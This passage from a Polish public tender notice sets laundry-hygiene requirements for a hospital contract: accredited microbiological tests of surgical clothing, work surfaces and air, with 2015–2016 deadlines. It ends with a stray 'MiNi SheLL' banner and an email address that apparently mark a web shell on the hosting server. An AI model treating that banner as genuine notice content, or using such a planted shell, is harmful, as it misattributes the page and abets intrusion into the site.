d) bielizny i/lub odzieży operacyjnej po praniu z dezynfekcją - co najmniej po jednym badaniu z I półrocza 2015 roku oraz z II półrocza 2015 roku, badania muszą być wykonane przez laboratorium posiadające akredytację Polskiego Centrum Akredytacji
e) blatu składarki do fartuchów i ubrań operacyjnych - co najmniej jedno badanie wykonane w 2015 roku badania muszą być wykonane przez laboratorium posiadające akredytację Polskiego Centrum Akredytacji,
Wszystkie ww. badania muszą być wykonane przed datą opublikowania ogłoszenia o wszczęciu niniejszego postępowania przetargowego tj. 14.12.2015 r.
- Wykonawca załączy do oferty wyniki badań mikrobiologicznych czystości powietrza w pralni, wykonane metodą zderzeniową przez laboratorium posiadające akredytację Polskiego Centrum Akredytacji - co najmniej po jednym badaniu dotyczącym strony czystej i strony brudnej pralni, wykonanym w okresie ostatnich 6 miesięcy kalendarzowych poprzedzających datę opublikowania ogłoszenia o wszczęciu niniejszego postępowania przetargowego. Zamówienie musi zostać zrealizowane w terminie 12 miesięcy od daty 01.02.2016 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com